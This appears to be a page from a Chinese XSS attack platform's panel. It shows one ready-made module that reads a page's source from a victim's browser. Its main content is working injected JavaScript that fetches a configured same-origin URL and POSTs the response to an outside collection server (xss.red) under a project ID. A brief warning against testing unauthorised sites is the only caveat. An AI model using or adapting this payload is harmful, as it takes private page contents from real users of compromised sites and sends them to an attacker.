存档
那些文章
漏洞预警
圈内新闻
资源分享
设计笔记
吐槽
笔记
关于
留言
友链
计划
读者墙
标签集
面板
更新历史
提交需求
Chatgpt
XSS平台
子站搜索
会员面板
请经常阅读公告和更新日志来快速了解面板的发展情况.
未登录
未激活
面板公告
更新历史
提交需求
需求列表
Chatgpt
XSS 平台
我的模块
公共模块
辅助扩展
短号选择
子站搜索
面板密语
个人设置
消费清单
退出登录
测试之前,请妥善考虑一二,请勿胡乱搞事情,测试未授权网站有风险!
模块名称
post指定页面源码读取
模块描述
post这种方式比较好,比GET好。 filename:本人解释一下,你需要读取的URL地址。必须要跟你XSS插入的是同一个域名哦。
参数
需要服务器接收的参数名
["mycode"]
配置参数
使用此模块时需要配置的参数,如参数名为user,则代码引用:{set.user}
["filename"]
代码
{projectId}为项目id,{set.***}为***配置参数
var u = 'http://xss.red/xss.php?do=api&id={projectId}'; var cr; if (document.charset) { cr = document.charset } else if (document.characterSet) { cr = document.characterSet }; function createXmlHttp() { if (window.XMLHttpRequest) { xmlHttp = new XMLHttpRequest() } else { var MSXML = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP'); for (var n = 0; n < MSXML.length; n++) { try { xmlHttp = new ActiveXObject(MSXML[n]); break } catch(e) {} } } } createXmlHttp(); xmlHttp.onreadystatechange = writeSource; xmlHttp.open("GET", "{set.filename}", true); xmlHttp.send(null); function postSource(cc) { createXmlHttp(); url = u; cc = "mycode=" + cc; xmlHttp.open("POST", url, true); xmlHttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xmlHttp.setRequestHeader("Content-length", cc.length); xmlHttp.setRequestHeader("Connection", "close"); xmlHttp.send(cc) } function writeSource() { if (xmlHttp.readyState == 4) { var c = new postSource(xmlHttp.responseText) } }
返回